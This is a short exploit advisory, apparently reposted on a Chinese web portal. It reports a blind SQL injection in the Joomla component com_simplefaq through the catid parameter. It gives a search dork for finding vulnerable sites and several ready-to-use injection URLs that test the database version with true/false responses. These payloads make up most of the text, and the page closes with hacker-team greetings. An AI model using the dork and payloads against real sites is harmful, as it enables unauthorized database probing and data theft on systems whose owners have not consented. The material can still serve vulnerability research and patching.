Joomla Component com_simplefaq (catid) Blind Sql Injection Vulnerability
2010-02-09 10:16:44 作者:root 来源: 浏览次数:0
网友评论 条
Joomla Component com_simplefaq (catid) Blind Sql Injection Vulnerability
====================================================================
Joomla Component com_simplefaq (catid) Blind Sql Injection Vulnerability |
========================================================================= |
########################################### |
.:. Author : AtT4CKxT3rR0r1ST |
.:. Team : Sec Attack Team |
.:. Home : www.sec-attack.com/vb |
.:. Script : Joomla Component com_simplefaq |
.:. Script Download: http://www.parkviewconsultants.com/component/option,com_mosipn/page,free/ |
.:. Bug Type : Blind Sql Injection |
.:. Dork : inurl:"com_simplefaq" |
############################################# |
www.site.com/index.php?option=com_simplefaq&func=display&Itemid=49&catid=70[Blind Injection]&page=1#FAQ5 |
www.site.com/index.php?option=com_simplefaq&func=display&Itemid=49&catid=70+and substring(@@version,1,1)=5&page=1#FAQ5 >>>> True |
www.site.com/index.php?option=com_simplefaq&func=display&Itemid=49&catid=70+and substring(@@version,1,1)=4&page=1#FAQ5 >>>> False |
http://server/index.php?option=com_simplefaq&func=display&Itemid=49&catid=70+and substring(@@version,1,1)=5&page=1#FAQ5 >>>> True |
http://server/index.php?option=com_simplefaq&func=display&Itemid=49&catid=70+and substring(@@version,1,1)=4&page=1#FAQ5 >>>> False |
############################################# |
Greats T0: HackxBack & Zero Cold & All My Friend & All Member Sec Attack |
[收藏]
[打印] [关闭]
[返回顶部]